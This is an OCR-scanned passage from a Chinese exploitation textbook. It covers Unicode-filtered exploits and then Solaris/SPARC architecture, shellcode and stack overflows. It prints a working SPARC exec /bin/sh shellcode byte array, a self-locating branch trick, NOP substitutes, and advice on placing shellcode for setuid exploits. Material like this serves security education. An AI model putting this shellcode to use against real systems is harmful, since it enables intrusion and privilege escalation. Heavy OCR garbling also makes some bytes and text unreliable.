pop eax 

imul eax, dword ptr[eax],0x00410041 

这 将 把 0ox00000000 压 入 栈 ， 然 后 弹出 到 ERAX。ERAx 现 在 是 0，ERx 递 增 1， 然 后 压 入 栈 。. 栈 顶 
现在 是 0x00000001， 随 后 可 把 栈 顶 的 地 址 压 入 栈 。 然 后 弹出 到 ERAx，EAx 现 在 指向 1。 我 们 把 组 
冲 区 的 地 址 乘 以 1， 实 际 上 ， 这 条 指令 是 把 缓冲 区 的 地 址 移 到 EAX。 它 只 是 一 个 借口 , 但 是 不 能 执 
行 mov eax, 0x00410041， 因 为 隐 含 在 这 条 指令 后 面 的 机 器 码 并 没有 用 Unicode 形 式 。 

一 旦 缓冲 区 的 地 址 在 EAX 中 ， 即 可 把 它 压 入 栈 ， 并 弹出 到 ECX。 

push eax 

pop ecx 
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然后 需要 调整 它 。 我 们 把 编写 译 码 器 编写 器 作为 练习 留 给 读者 。 本 节 已 经 提供 了 完成 这 个 练 
习 所 需要 的 信息 。 
9.6 小结 

本 章 介绍 了 怎样 破解 那些 带 有 过 滤器 的 漏洞 。 许 多 漏洞 的 缓冲 区 只 接受 可 打印 的 ASCI 字 
符 ， 或 者 需要 用 Unicode 来 破解 。 一 般 情况 下 ， 这 些 漏洞 被 归纳 为 “不 可 破解 ”， 但 是 ， 适 当地 使 
用 过 滤器 和 译 码 器 ， 再 加 上 一 点 创造 力 ， 它 们 实际 上 是 可 以 破解 的 。 

我 们 还 介绍 了 怎样 编写 过 滤器 以 及 Roman 破 解 编写 器 的 百叶 窗 方法 。 利 用 过 滤器 可 以 破解 存 
在 Unicode 过 滤器 的 漏洞 ， 利 用 百叶 窗 方 法 可 以 破解 可 打印 的 ASCII 字 符 漏洞 。 
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4B 长 一 段 时 间 以 来 ，Solaris 主 要 支持 高 端的 Web 服 务 器 和 数据 库 服务 器 。 尽 管 Solaris 有 

TR ass 版 ， 但 绝 大 多 数 的 Solaris 还 是 运行 在 SPARC 架 构 之 上 。 在 本 章 将 把 精力 放 在 
Solaris 的 SPARC 版 本 上 ， 它 是 Solaris 的 最 重要 版 本 。Solaris 在 以 前 被 称 为 SunOS， 当 然 这 样 的 称 
呼 已 渐渐 被 大 家 遗 让 了 ， 现 在 常见 的 版 本 是 2.6、2.7、2.8 和 2.9。 

当 其 他 的 操作 系统 倾向 于 在 默认 安装 情况 下 只 提供 基本 服务 时 ，Solaris 9 仍 提供 了 大 量 的 远 
程 监听 服务 ， 例 如 ， 默 认 安 装 的 Solaris 9 启用 了 近 20 个 RPC 服 务 。 现 在 ， 在 网 络 上 可 以 获得 大 量 
的 Solaris 源 代码 ， 这 似乎 预示 着 在 RPC 里 可 能 会 发 现 更 多 的 漏洞 。 

几乎 所 有 的 Solaris RPC 服 务 都 出 现 过 漏洞 (sadmind、cmsd、statd、automount 通 过 statd、 
snmxdmidG、dmispd、cachefsd 等 )， 也 发 现 了 通过 ineta 使 用 的 远程 错误 ， 如 telnetd、 
/bin/login 《通过 telnetd 和 rshd)、dtspcd、1lpd 等 。Solaris 在 默认 状态 下 有 大 量 带 setuig 位 
的 文件 ， 因 此 ， 在 正式 使 用 Solaris 前 ， 应 该 仔细 对 它 进行 加 固 。 

当然 ，Solars 也 内 置 了 一 些 安全 功能 ， 包 括 进程 记 账 、 审 计 和 可 选 的 非 可 执行 栈 。 从 管理 员 
的 立场 来 看 ， 启 用 这 个 选项 是 值得 的 ， 因 为 它 对 系统 提供 了 一 定 程度 上 的 保护 。 


10.1 SPARC 体系 结构 介绍 


SPARC (Scalable Processor Architecture) 是 广泛 使 用 的 硬件 平台 ， 对 Solaris 的 支持 非常 好 。 
它 最 初 由 Sun 公 司 开 发 ， 后 来 逐渐 演变 成 一 个 开放 的 标准 。 它 最 早 有 两 个 版 本 〈《v7 和 v8)， 都 是 32 
位 的 ， 当 然 ， 最 新 的 版 本 (v9) 是 64 位 的 。SPARC v9 处 理 器 在 传统 的 低 效率 运行 模式 中 ， 可 以 
运行 64 位 及 32 位 程序 。 : 

UltraSPARCAE 8 3878 Ej Sun: HI JSPARC v9， 具 有 运行 64 位 程序 的 能 力 Sun 公 司 的 其 他 CPU 
实际 上 都 是 来 自 SPARC v7 或 v8， 仅 在 32 位 模式 下 运行 程序 。Solaris 7、8 和 9 都 支持 64 位 内 核 ， 可 
以 运行 64 位 用 户 模式 的 程序 ， 然 而 ， 大 多 数 用 户 模式 的 程序 是 以 32 位 运行 的 。 

SPARC 处 理 器 有 32 个 通用 寄存 器 ， 随 时 可 以 使 用 。 其 中 一 些 有 特殊 用 途 ， 剩 下 的 由 编译 器 
分 配 或 由 程序 员 自 由 处 理 。 我 们 一 般 把 32 个 寄存 器 分 成 4 类 ; 全 局 寄存 器 、 局 部 寄存 器 、 输 入 寄 
存 器 和 输出 寄存 器 。 

实际 上 ，SPARC 体 系 结构 是 big-endian， 意 味 着 首先 在 内 存 里 用 最 有 效 的 字 节 表示 整数 和 指 
针 。 它 的 指令 长 度 是 固定 的 ， 都 是 4 字 节 长 ， 所 有 的 指令 以 4 字 节 为 界 进 行 对 齐 ， 任 何在 不 对 齐 的 
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地 址 上 执行 的 代码 都 会 导致 808 错 误 ， 同 样 ， 读 写 任何 未 对 齐 的 地 址 也 会 导致 Brs 错 误 并 引起 程 


10.1.1 寄存 器 和 寡 存 器 窗口 


SPARC CPU 可 使 用 的 寄存 器 总 数 可 以 改变 ， 但 它们 被 分 成 了 固定 数量 的 寄存 器 窗口 。 一 个 
寄存 器 窗口 就 是 某 个 函数 使 用 的 一 组 寄存 器 。 当 前 寄存 器 窗口 指针 通过 save 和 restore 指 令 来 增 
加 或 减少 。 函 数 在 开始 和 结束 时 通常 会 执行 这 两 条 指令 。 

save 指 令 保 存 当 前 的 寄存 器 窗口 ， 使 系统 分 配 一 组 新 的 寄存 器 ; restore FEF HATHA 
存 器 窗口 ， 恢 复 前 面 保存 的 数据 。 可 以 用 save 指 令 为 局 部 变量 保留 栈 空间 ， 用 restore 函 数 释放 
局 部 栈 空间 。 

无 论 是 函数 调用 ， 还 是 执行 save 或 restore 指 令 ， 都 不 会 影响 到 全 局 寄存 器 ($g0— $972. 
第 一 个 全 局 寄存 器 %g0 永 远 是 零 。 写 入 它 的 数据 会 被 丢弃 ， 任 何以 它 为 源 寄存 器 的 复制 操作 将 把 
目标 操作 数 设 为 零 。 除 了 gg0 之 外 ， 剩 下 的 7 个 全 局 寄存 器 也 各 有 用 途 ， 表 10-1 里 有 具体 介绍 。 

局 部 寄存 器 〈#%10 一 %17) 对 于 具体 的 函数 来 说 是 局 部 的 。 它 们 作为 寄存 器 窗口 的 一 部 分 被 
保存 和 恢复 。 局 部 寄存 器 没有 特殊 的 用 途 ， 编 译 器 可 以 随意 使 用 。 每 个 函数 也 都 可 以 使 用 它们 。 

执行 save 时 ， 输 出 寄存 器 (€o0— $07) 将 改写 输入 寄存 器 〈%i0 一 %i7)。 执 行 restore 有 时， 
执行 相反 的 操作 , 输入 寄存 器 将 改写 输出 寄存 器 。save 把 前 一 个 函数 的 输入 寄存 器 作为 寄存 器 窗 
口 的 一 部 分 加 以 保存 。 

开始 的 6 个 输入 寄存 器 〈$#%i0 一 %i5) 传 入 函数 参数 。 它 们 作为 so0 至 se5 传 递 给 函数 ， 当 执行 
save 时 ， 它 们 变 成 si0 一 si5。 当 函数 需要 6 个 以 上 的 参数 时 ， 额 外 的 参数 将 通过 栈 传道。 函数 的 
返回 值 存储 在 si0 里 ， 执 行 restore 时 转 为 go0。 

%o6 寄 存 器 和 栈 指针 %sp 是 同义词 ， 而 4si6 是 帧 指针 8%fp。Save 像 前 一 个 函数 预期 那样 ， 把 栈 
指针 作为 帧 指针 保存 ，restore 把 保存 的 栈 指针 恢复 到 它 原来 的 地 方 。 

至 今 没 有 提 及 的 两 个 通用 寄存 器 so7 和 si7， 可 用 于 保存 返回 地 址 。 执 行 cal1 后 ， 返 回 地 址 
保存 在 so7。 当 执行 save 时 ， 这 个 值 毫 无 疑问 会 被 复制 到 si7， 它 保持 直到 执行 一 个 返回 和 
restore 为 止 。 在 这 个 值 被 复制 到 输入 寄存 器 之 后 ，%o7 就 变 成 一 个 普通 用 途 的 寄存 器 了 。 总 结 
输入 /输出 寄存 器 用 途 的 列表 见 表 10-2。 


表 10-1 全 局 寄存 器 及 其 用 途 表 10-2 ”寄存 器 名 称 和 用 途 
* 存 器 用 R 寄 F 器 用 R 
%g0 永 为 0 $10 第 一 个 进入 的 函数 参数 ， 返 回 值 
%g1 临时 存储 iL~%i5 第 二 个 至 第 六 个 进入 的 函数 参数 
%g2 全 局 变量 1 %i6 帧 指针 〈 保 存 的 栈 指 针 》 
%g3 全 局 变量 2 $17 返回 地 址 
%g4 全 局 变量 3 $00 第 一 个 输出 的 函数 参数 ， 来 自 被 调用 的 函数 的 返回 值 
%g5 保留 %o1~$05 第 二 个 至 第 六 个 输出 的 函数 参数 
%g6 保留 $06 栈 指针 


%g7 保留 %07 紧 接 着 调用 之 后 包含 返回 地 址 ， 和 否则 用 于 通常 目的 
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为 了 方便 ， 在 表 10-3 里 和 10-4 里 总 结 了 save 和 restore 的 作用 。 


表 10-3” ”save 指令 的 作用 表 10-4 ”restore 指 令 的 效果 
(1) 局 部 寄存 器 (%10~%17〉 作 为 寄存 器 窗口 的 一 部 分 被 保存 (1) 输入 寄存 器 变 成 输出 寄存 器 
(2) 输 入 寄存 器 《%i0~%i7) 作为 寄存 器 窗口 的 一 部 分 被 保存 (2) 从 保存 的 寄存 器 窗口 恢复 原来 的 输入 寄存 器 
(3) 输出 寄存 器 〈s#so0 一 so7) 变 成 输入 寄存 器 (3) 从 保存 的 寄存 器 窗口 恢复 原来 的 局 部 寄存 器 
(4) 保留 指定 数量 的 栈 空间 (4) 作为 第 一 步 操作 的 结果 ，#sp (06) 变 成 sfp 


(%i6) ， 从 而 释放 局 部 栈 空 间 


对 于 leaf 函 数 〈 不 调用 其 他 函数 的 函数 )， 编译 器 可 以 生成 不 执行 save 或 restroe 的 指令 ,以 
省 去 这 些 操作 带 来 的 开销 , 但 是 系统 不 能 改写 输入 寄存 器 或 局 部 寄存 器 ,必须 在 输出 寄存 器 里 访 
问 参数 。 

任何 确定 的 SPARC CPU 都 有 国定 数量 的 寄存 器 窗口 。 在 它们 可 用 的 时 候 ， 用 来 保存 需 保 存 
， 的 寄存 器 。 当 寄存 器 窗口 用 完 后 ， 最 早 的 寄存 器 窗口 被 刷新 ， 相 关 的 数据 被 压 入 栈 。 每 条 save 
指令 至 少 在 栈 上 保留 64B 的 空间 ， 在 必要 时 也 会 保存 本 地 寄存 器 和 输入 寄存 器 的 内 容 。 当 发 生 上 
下 文 切换 时 ， 或 者 发 生 大 量 的 陷阱 或 中 断 时 ， 所 有 的 寄存 器 窗口 都 有 可 能 被 刷新 ， 从 而 把 寄存 器 
窗口 中 的 数据 压 入 栈 。 


10.1.2 ”延迟 模 

和 其 他 的 体系 结构 类 似 ，SPARC 在 执行 分 支 、 调 用 或 跳 转 指令 时 使 用 延迟 模 。 在 程序 执行 
过 程 中 ， 有 两 个 寄存 器 用 来 指定 控制 流 ， spc 是 程序 计数 器 ， 指 向 当前 的 指令 ，snpec 指 向 将 被 执 
行 的 下 一 条 指令 。 当 执行 分 支 或 调用 指令 时 ， 目 的 地 址 被 加 载 到 snpc 而 不 是 spc。 这 导致 在 执行 
流 被 重 定 向 到 目的 地 址 之 前 ， 分 支 /调用 之 后 的 指令 被 执行 。 


0x10004: CMP %00, 0 
0210008: BE 0220000 
0x1000C: ADD %o1, 1, %01 
0x10010: MOV 0x10, %o1 


在 这 个 例子 里 ， 如 果 %o0 保 存 零 ， 在 0x10008 的 分 支 将 被 采用 。 然 而 ， 在 采用 这 个 分 支 前 ， 
0x1000c 处 的 指令 被 执行 。 如 果 这 个 分 支 在 0x10008 没 有 被 采用 ，0x1000c 处 的 指令 仍 被 执行 ， 
执行 流 继续 到 0x10010。 如 果 一 个 分 支 被 取消 ， 例 如 BE，A address, JA [XX TEX RIXA X 
时 , 才 会 执行 延迟 模 的 指令 。 很 多 因素 都 会 影响 SPARC 上 的 执行 流程 , 然而 , 即使 是 为 了 写 破解 ， 
也 没有 必要 全 部 理解 它们 。 

10.1.3 合成 指令 

SPARC 里 的 许多 指令 是 由 其 他 指令 合成 的 ， 或 者 是 其 他 指令 的 别名 。 因 为 所 有 的 指令 都 是 
4B， 所 以 ， 它 要 用 两 条 指令 把 32 位 值 加 载 到 寄存 器 。 更 有 趣 的 是 ，cal1 和 ret 都 是 合成 的 指令 。 
call 更 准确 的 形式 是 jmpl address，%o7。jmpl 是 一 个 链接 的 跳 转 ， 它 把 当前 指令 指针 的 值 保 
存在 目标 操作 数 里 。 用 cali 指 令 时 ， 目 的 操作 数 是 寄存 器 $07。ret 只 是 jmpl %i7+8, %g0, El 
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到 保存 的 返回 地 址 上 来 。 程 序 计 数 器 的 值 被 丢 给 sg0 寄 存 器 ， 而 该 寄存 器 总 是 为 零 。 
Leaf 函数 用 另外 的 合成 指令 ret1 返 回 。 因 为 它们 不 必 执 行 save 或 xestore， 因 此 ， 返 回 地 
址 在 so7 里 。ret1 是 jmp1 %o7+8，%g0 的 别名 。 


10.2 Solaris/SPARC shellcode 基础 


SPARC 上 的 Solaris 和 其 他 的 UNIX 操 作 系 统 类 似 ， 都 有 明确 定义 的 系统 调用 接口 。 
Solaris/SPARC 平 台 上 的 shellcode 和 其 他 平台 上 的 差不多 ， 一 般 也 使 用 系统 调用 而 不 是 调用 库 函 
数 。 网 上 有 大 量 的 Solaris/SPARC shellcode， 大 多 都 流传 了 很 多 年 。 如 果 你 只 想 找 一 些 平常 使 用 的 
代码 或 只 用 于 破解 目的 ,在 网 上 肯定 可 以 找到 合适 的 shellcode。 然 而 , 如 果 你 希望 自己 写 shellcode， 
那么 必须 掌握 本 章 所 介绍 的 基础 知识 。 

系统 通过 特殊 的 系统 陷阱 8 开始 系统 调用 。 然 而 ，SunOS 最 初 是 用 陷阱 0 开始 系统 调用 的 ， 
只 是 最 近 的 Solaris 版 本 才 改 成 陷阱 8。 系 统 调用 号 通过 全 局 寄存 器 sg1 指 定 。 作 为 正常 的 函数 
参数 ， 少 于 6 个 的 系统 调用 参数 都 是 通过 输出 寄存 器 $00 到 %o5 传 递 的 。 大 多 数 系统 调用 的 参 
数 一 般 都 少 于 6 个 ， 但 有 些 函 数 可 能 需要 6 个 以 上 的 参数 ， 这 时 ， 一 般 通 过 栈 来 传递 这 些 额外 
的 参数 。 

10.2.1 自 定位 和 SPARC shellcode 


为 了 引用 自身 包含 的 字符 串 ， 多 数 shellcode 都 需要 一 个 在 内 存 里 定位 自己 位 置 的 方法 。 在 运 
行 时 构造 字符 串 并 将 其 作为 代码 的 一 部 分 ， 有 可 能 可 以 避免 这 样 做 ， 但 这 样 则 明显 缺乏 效率 和 可 
靠 性 。 在 x86 上 ， 通 过 跳 转 和 cal1/pop 指 令 对 可 以 轻松 完成 自 定位 。 但 在 SPARC 上 ， 由 于 延迟 模 
的 存在 ， 以 及 为 了 避免 shellcode 里 出 现 空 字 节 ， 所 使 用 的 指令 要 复杂 一 些 。 

下 面 的 指令 把 shellcode 的 地 址 载 入 寄存 器 so7， 这 个 方法 很 有 效 ， 已 经 在 SPARC shellcode 里 
使 用 过 很 多 年 了 : 

(1) \x20\xbf£\xff\xf£ // bn, a shellcode - 4 

(2) \x20\xbf\xff\xff// bn, a shellcode 

(3) \x7£\xf£\xff\xf£ // call shellcode + 4 

(4) shellcode 的 其 余 代 码 . 

这 个 bn, a 是 已 经 废除 的 branch never 指 令 。 换 句 话 说 , 这 些 分 支 指 令 从 来 没 被 采用 过 (branch 
never)， 这 意味 着 延迟 横 总 是 被 跳 过 。call 指 令 是 真正 的 链接 跳 转 ， 即 把 当前 指令 计数 器 的 值 存 
储 在 so7 里 。 

上 述 指令 执行 的 顺序 是 (1)，(3)，(4)，(2)，(4)。 

这 段 代码 导致 cal1 指 令 的 地 址 被 保存 在 so7 里 ， 使 shellcode 可 以 定位 它 在 内 存 里 的 字符 串 。 


10.2.2 ”简单 的 SPARC exec shellcode 


大 部 分 sellcode 的 最 终 目的 是 执行 命令 行 shell, 然后 从 shell 里 完成 其 他 事情 。 下 面 介 绍 一 些 非 
常 简单 的 shellcode， 它 们 在 Solaris/SPARC 上 执行 /bin/sh。 
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在 现代 Solaris 机 器 上 ，exec 系 统 调用 的 是 编号 11， 它 需要 两 个 参数 ， 第 一 个 是 指向 要 执行 的 
文件 名 的 字符 指针 ， 第 二 个 是 一 个 非 终 止 字符 指针 数组 ， 用 于 指定 文件 参数 。 这 两 个 参数 分 别 被 
保存 在 %o0 和 %ol， 系 统 调用 编号 被 保存 在 %g1。 下 面 的 shellcode 演 示 了 具体 操作 方法 。 


static char scode[]= "\x20\xbf\xffi\xff" // 1: bn,a scode - 4 
"\x20\xbE\xff\xff£" // 2: bn,a scode 
"\x7f\xff\xff\xff" // 3: call scode + 4 
"\x90\x03\xe0\x20" // 4: add %07, 32, %00 
"\x92\x02\x20\x08" // 5: add $o0, 8, %ol 
"\xd0\x22\x20\x08" // 6: st $o0, [$00 + 8] 
"\xc0\x22\x60\x04" // Ts st gO, [$01 + 4] 
"\xcO\x2a\x20\x07" // 8: stb %g0, [$00 + 7] 
"\x82\x10\x20\x0b" // 9: mov 11, %g1 
"\x91\xd0\x20\x08" // 10: ta 8 
"/bin/sh"; // 11: shell string 

下 面 逐 行 解 释 这 段 代 码 。 

(1) 这 段 熟 悉 的 代码 把 shellcode 的 地 址 载 入 so7。 

(2) 定位 延续 地 载 入 代码 。 

(3) 重复 一 次 。 


(4) 把 /bin/sh 的 地 址 载 入 so0， 这 是 系统 调用 的 第 一 个 参数 。 

(5) 把 函数 参数 数组 的 地 址 载 入 sol。 这 个 地 址 位 于 /binyVysh 后 面 8B 处 ， 在 shellcode 结 尾 后 面 
1B 处 ， 是 系统 调用 的 第 二 个 参数 。 

(6) 用 字符 串 /biny/sh 初 始 化 参数 数组 (argv[0] ) 的 第 一 个 成 员 。 

(7) 把 参数 数组 的 第 二 个 成 员 设 为 空 值 ， 以 终止 数组 〈%g0 总 是 空 值 )。 

(8) 在 正确 位 置 写 一 个 空 字 节 ， 确 保 /bin/sh 字 符 串 完全 被 空 值 终止。 

(9) 把 系统 调用 编号 载 入 %gl (11=sys_exec). 

(10) 通过 陷阱 8 (ta 代表 陷阱 》 执 行 系统 调用 。 

(11) shell 字符 串 。 


4n23 Solaris 里 有 用 的 系统 调用 
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10.2.4 NOP 和 填充 指令 


为 了 增加 破解 的 可 靠 性 并 减少 对 精确 地 
址 的 依赖 性 ， 可 在 破解 载荷 里 使 用 填充 指令 。 
但 在 大 多 数 情况 下 ，SPARC 的 NOP 指 令 没 什么 
用 处 ， 因 为 它 包 含 3 个 室 字 节 ， 在 大 多 数 基 于 
字符 串 的 溢出 里 不 会 被 复制 。 但 是 ,许多 指令 
可 以 代替 它 ， 并 且 具 有 同样 的 效果 ， 如 表 10-6 
中 所 示 。 


10.3 Solaris/SPARC 栈 帧 介绍 


Solaris/SPARC 中 栈 帧 的 组 织 和 其 他 平台 中 的 类 
We Fe Bintel x86 中 的 一 样 ， 用 于 保存 局 部 变量 和 寄存 


310-6 NOPR% 


SPARC 填 充 指令 字 节 顺序 

sub %g1, %g2, %g0 "\xB80\x20\x40\x02" 
andcc $17, $17, %g0 "\x80\x8d\xc0\x17" 
or %g0, Oxfff, $g0 "\x80\x18\x2£\xff" 


3210-7 ”Solaris 的 内 存 管理 


栈 顶 一 高 内 存 地 址 
器 中 的 数据 〈 见 表 10-7)， 地 址 也 是 从 大 到 小 ， 依 次 减 rm 
少 的 。 系 统 在 栈 上 为 32 位 二 进 制 文 件 里 的 函数 至 少 保 为 局 部 变量 保留 的 空间 
留 96B 的 空间 ， 这 些 空间 除了 保存 8 个 本 地 寄存 器 和 8 大 小 : 可 变 的 
个 输入 寄存 器 外 ， 还 剩 下 32B; 这 32B 用 于 保存 返回 的 函数 1 


结构 指针 和 参数 的 副本 ， 以 防止 它们 被 寻 址 (如 果 指 
向 它们 的 指针 必须 被 传递 给 另外 的 函数 )。 对 任何 函数 


为 返回 结构 保留 的 空间 指针 和 参数 的 副本 
大 小 : 32B 


都 这 样 组 织 酚 帧 ， 所 以 为 局 部 变量 保留 的 空间 比 为 保 IO | 
存 的 寄存 器 保留 的 空间 更 靠近 栈 项 。 这 可 以 预防 函数 为 四 
改写 它 自己 保存 的 寄存 器 。 aT 


Solaris 的 栈 通常 用 于 保存 结构 和 数组 ， 而 不 像 x86 
平台 那样 还 保存 整数 和 指针 。 在 大 多 数 情况 下 ， 整 数 和 指针 保存 在 通用 寄存 器 里 ， 除 非 参数 的 数 
量 超出 可 用 的 寄存 器 ， 或 者 要 求 它们 必须 是 可 寻 址 的 ， 才 会 把 它们 放 到 栈 上 。 


10.4 Fem AAs 
让 我 们 看 一 些 最 流行 的 Solaris 栈 溢出 方法 。 在 某 些 情况 下 ， 它 们 和 JIntel IA32 的 稍微 有 些 不 
同 ， 但 也 有 很 多 共性 。 


10.4.1 任意 大 小 的 溢出 
SPARC 人 允许 改写 任意 大 小 的 栈 溢出 ， 这 和 JIntel x86 的 有 很 多 相似 之 处 。 最 后 的 目标 都 是 改写 
保存 在 栈 上 的 指令 指针 ， 把 执行 流 重 定 向 到 包含 shellcode 的 地 址 。 然 而 ， 因 为 栈 的 组 织 形 式 ， 它 
可 能 只 能 改写 调用 函数 保存 的 寄存 器 。 最 终 的 效果 是 采用 两 个 函数 的 最 小 值 来 获取 执行 控制 。 
如 果 函 数 包含 栈 滋 出 ， 那 么 这 个 函数 的 返回 地 址 保存 在 si7 里 。SPARC 的 ret 指 令 是 由 jmpl 
si7+8，$%g0 合 成 的 ， 则 延迟 槽 通常 会 被 restore 指 令 填 充 。 第 一 个 ret / restore 指 令 对 将 产生 
一 个 新 值 ， 这 个 值 来 自从 保存 的 寄存 器 窗口 所 恢复 的 si7。 如 果 这 是 从 栈 上 而 不 是 从 内 部 寄存 器 
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恢复 的 , 且 已 经 作为 溢出 的 一 部 分 被 改写 了 , 那么 第 二 个 ret 将 导致 代码 执行 攻击 者 选择 的 地 址 。 
表 10-8 显 示 了 栈 上 保存 的 Solaris/SPARC 寄 存 器 窗口 信息 。 这 个 信息 的 组 织 形式 和 调试 器 ( 比 
如 说 GDB) 里 输出 的 差不多 。 输 入 寄存 器 比 局 部 寄存 器 更 靠近 栈 顶 。 


表 10-8 ” 栈 上 保存 的 寄存 器 窗口 布局 


%IO %I1 %I2 $13 
&I4 $15 *16 $17 
$10 $i1 $12 $13 
$i4 $i5 si6〔〈 保 存 的 sfp) gsi7《〈 保 存 的 spc) 


10.4.2” 寡 存 器 窗口 和 栈 溢出 的 复杂 性 


任何 SPARC CPU 都 有 固定 数量 的 内 部 寄存 器 窗口 .SPARC v9 的 CPU 可 以 使 用 2 一 32 个 寄存 器 
窗口 。 当 CPU 的 寄存 器 窗口 用 完 后 ， 再 执行 save 时 ， 将 产生 窗口 溢出 陷阱 ，CPU 将 刷新 寄存 器 窗 
口 的 内 部 寄存 器 ,把 相关 数据 压 入 栈 ; 在 发 生 上 下 文 切换 或 暂停 线程 时 ， 寄 存 器 窗口 肯定 会 被 刷 
新 ， 使 数据 入 栈 ; 系统 调用 通常 也 会 刷新 寄存 器 窗口 ， 使 数据 入 栈 。 

在 发 生 溢出 时 ， 如 果 试 图 改写 的 寄存 器 窗口 不 在 栈 上 , 而 是 在 CPU 的 寄存 器 里 ,破解 显然 不 
会 成 功 。 依 据 返回 ， 保 存 的 寄存 器 将 不 会 从 你 在 栈 上 改写 的 位 置 恢复 ， 而 是 从 内 部 寄存 器 恢复 。 
这 将 使 试图 改写 保存 的 si7 寄 存 器 的 攻击 更 加 困难 。 

当 缓冲 区 溢出 的 进程 被 调试 时 ， 它 的 行为 不 同 于 平时 ， 因 为 调试 器 的 停顿 (break 将 会 刷 
新 所 有 的 寄存 器 窗口 。 如 果 你 正在 调试 程序 ， 并 在 溢出 发 生前 停顿 ， 可 能 会 刷新 寄存 器 窗口 ， 从 
而 导致 其 他 的 溢出 不 会 再 发 生 了 。 最 常见 的 情形 是 ， 只 有 当 GDB 附 上 目标 进程 时 ， 破 解 才能 正常 
工作 。 这 是 因为 没有 调试 器 停顿 时 ， 寄 存 器 窗口 不 会 被 刷新 入 栈 ， 从 而 使 改写 没有 效果 。 


10.43 ”其 他 复杂 的 因素 


当 害 存 器 压 入 栈 时 ，%i7 是 最 后 被 压 入 的 。 这 意味 着 在 典型 的 字符 串 滋 出 里 ,为 了 改写 si7， 
首先 要 改写 其 他 的 寄存 器 。 在 最 好 的 情况 下 , 为 了 获取 程序 的 执行 控制 , 将 需要 一 个 额外 的 返回 。 
然而 ， 所 有 的 本 地 和 输入 寄存 器 都 已 经 被 溢出 破坏 了 。 最 常见 的 情形 是 ， 寄 存 器 包含 被 破坏 的 指 
令 ， 如 果 这 些 指令 是 无 效 的 ， 那 么 在 关键 函数 返回 之 前 ， 它 们 将 引起 访问 违例 或 段 失 效 。 为 了 在 
个 案 的 基础 上 评定 这 个 情形 并 且 为 不 同 于 返回 地 址 的 寄存 器 确定 适当 的 值 ， 可 能 必须 这 样 。 

SPARC 上 的 帧 指针 必须 以 8B 为 界 对 齐 。 如 果 改 写 一 个 帧 指针 ， 或 者 在 溢出 里 改写 多 个 保存 
的 寄存 器 ， 在 帧 指针 里 对 齐 是 基本 的 保护 措施 。 在 执行 estore 指 令 时 ， 如 果 没 有 对 齐 帧 指针 ， 
将 引起 Bus 错 误 ， 从 而 导致 程序 裔 溃 。 

10.4.4 可 能 的 解决 方法 

即使 第 一 个 寄存 器 窗口 没有 保存 在 栈 上 ， 也 仍 有 一 些 方法 可 以 执行 保存 的 si7 的 栈 改写 。 如 
果 攻 击 者 可 以 多 次 尝试 ， 将 有 可 能 尝试 多 次 溢出 ， 等 待 在 合适 的 时 刻 发 生 上 下 文 切换 ， 从 而 导致 
寄存 器 被 立刻 刷新 入 栈 。 然 而 ， 这 个 方法 不 太 可 靠 ， 因 为 并 不 是 所 有 的 溢出 都 可 以 重复 利用 。 

对 于 靠近 栈 顶 的 函数 ， 可 以 改写 保存 的 寄存 器 。 对 任何 确定 的 二 进 制 文件 ， 从 一 个 栈 帧 到 另 
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一 个 栈 帧 之 间 的 距离 通常 是 可 以 预计 且 可 以 计算 的 。 因此， 如果 第 一 个 调用 函数 的 寄存 器 窗口 没 
有 有 刷新 入 栈 ,或 许 在 调用 第 二 个 或 第 三 个 函数 时 才 会 导致 它 被 刷新 入 栈 。 然 而 ， 你 企图 改写 的 保 
存 的 寄存 器 越 靠近 调用 树 上 端 ， 赢 得 控制 所 需要 的 函数 返回 就 越 多 ， 防 止 程序 由 于 栈 恶化 而 般 溃 
也 会 越 困 难 。 

在 许多 情况 下 ,用 两 个 返回 改写 第 一 个 保存 的 寄存 器 窗口 并 执行 代码 是 有 可 能 的 ， 然 而， 对 
破解 来 说 ， 知 道 最 坏 的 情况 对 我 们 有 好 处 。 
10.4.5 off-by-one 栈 溢出 漏洞 

SPARC 上 的 o 信 by-one 漏 洞 非常 难 破 解 ， 并 且 在 大 多 数 情 况 下 是 不 可 破解 的 。o 企 by-one 破 解 
的 原理 主要 是 基于 指针 恶化 的 。 对 于 Intel x86 上 的 破解 ， 最 明确 的 方法 是 改写 保存 的 帧 指针 的 最 
没 意 义 的 位 ， 通 常 是 栈 上 紧 跟 着 局 部 变量 的 第 一 个 地 址 。 如 果 帧 指针 不 是 目标 ， 另 外 的 指针 很 有 
可 能 是 目标 。 绝 大 部 分 的 offby-one 漏 洞 是 由 于 空 字 节 终止 的 原因 ， 当 剩 余 的 缓冲 区 空间 不 够 用 
时 ， 通 常会 导致 一 个 空 字 节 被 写 到 边界 之 外 。 

SPARC 用 big-endian 字 节 顺 序 表示 指针 。 在 off-by-one 例 子 里 ， 最 有 意义 的 字 节 将 被 破坏 ， 而 
不 是 改写 保存 在 内 存 里 的 指针 的 最 没 意 义 的 字 节 。 对 指针 的 改变 还 不 是 一 星 半点 , 而 是 使 其 发 生 
巨大 变化 。 例 如 ， 当 标准 栈 指针 0xFFBF1234 最 有 意义 的 字 节 被 改写 后 ， 可 能 指向 0xBF1234。 这 
个 地 址 是 无 效 的 ， 除 非 堆 非 常 大 而 扩展 到 那个 地 址 。 只 有 在 可 选择 的 情况 下 ， 这 才 是 可 行 的 。 

除 字 节 顺序 问题 外 ， Solaris/SPARC 上 指针 恶化 的 目标 是 受 限 的 。 它 不 可 能 到 达 帧 指针 ， 因 
为 帧 指针 保存 在 寄存 器 数组 深 处 。 它 很 可 能 是 唯一 可 能 被 破坏 的 局 部 变量 , 或 第 一 个 保存 的 寄存 
器 %10。 尽 管 必 须 对 o 企 by-one 漏 洞 进行 评估 后 才能 做 出 正确 判断 ， 但 对 破解 来 说 ，SPARC 的 
off-by-one 栈 溢出 最 多 只 提供 了 有 限 的 可 能 性 。 


10.4.6 shellcode 的 位 置 


必须 寻找 一 个 好 的 方法 把 执行 流 重 定向 到 包含 shellcode 的 地 址 ,shellcode 可 以 放 在 儿 个 地 方 ， 
每 个 地 方 都 有 它 的 优 缺 点 。 选 择 把 shellcode 放 在 哪里 时 考虑 最 多 的 因素 应 该 是 可 靠 性 ， 这 通常 由 
正在 破解 的 目标 程序 体现 出 来 。 

对 于 破解 本 地 setuid 程 序 来 说 ， 有 可 能 完全 控制 目标 程序 的 环境 变量 和 参数 。 假 若 这 样 ， 
把 shellcode 加 上 大 量 的 填充 物 后 注入 环境 变量 是 可 能 的 ， 这 样 便 能 在 可 预计 的 栈 地 址 找到 
